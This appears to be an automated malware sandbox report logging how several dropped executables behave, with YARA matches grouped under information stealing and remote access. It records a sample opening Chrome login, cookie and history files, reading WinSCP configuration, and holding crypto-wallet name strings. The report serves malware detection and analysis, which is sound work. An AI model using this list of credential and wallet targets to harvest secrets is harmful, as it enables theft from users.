Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\816F.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\2B4A.exe Code function: 12_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 12_2_00412A15

Stealing of Sensitive Information

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 0000000F.00000002.556830130.0000000000B4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.542120947.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.555134587.0000000000B33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rovwer.exe PID: 4764, type: MEMORYSTR
Source: Yara match File source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ElectrumE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: JaxxE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: ExodusE#
Source: 2B4A.exe, 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: EthereumE#
Source: 2B4A.exe, 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: set_UseMachineKeyStore
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\86EE.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\86EE.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration
Source: Yara match File source: 0000000C.00000002.593637539.00000000029CB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR

Remote Access Functionality

barindex
Source: Yara match File source: dump.pcap, type: PCAP
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.740e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2840000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.780000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22ba196.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540ee8.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.2540000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.453D.exe.774fd8.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.2B4A.exe.22bb07e.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.2B4A.exe.856710.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000003.399248246.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.557498334.0000000000774000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.397792222.0000000000780000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.561654188.000000000227A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.582776721.0000000002540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.526298773.0000000000740000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.517740314.0000000000400000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.590764503.0000000002840000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 2B4A.exe PID: 5260, type: MEMORYSTR
Source: Yara match File source: 00000013.00000002.560249916.0000000001858000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 6644.exe PID: 1916, type: MEMORYSTR
Source: Yara match File source: 19.2.6644.exe.950000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 19.2.6644.exe.12794a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.556838350.0000000001279000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.520066119.0000000000591000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002C.00000002.520020559.00000000003D1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 1768, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: explorer.exe PID: 5080, type: MEMORYSTR
Source: Yara match File source: 11.2.tiddsjj.930e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.3.tiddsjj.950000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.tiddsjj.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.S2XJ2wbz7u.exe.870000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.S2XJ2wbz7u.exe.860e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000B.00000002.378864135.0000000002611000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.246440191.0000000000870000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327477801.0000000000D61000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.366967601.0000000000950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.378578278.00000000009E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.308924439.0000000003321000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.327296717.00000000009C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.457565511.00000000012D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000029.00000002.464734781.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.463148223.0000000000910000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.456037519.0000000001560000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 4972, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5400, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 86EE.exe PID: 5560, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 8C00.exe PID: 5936, type: MEMORYSTR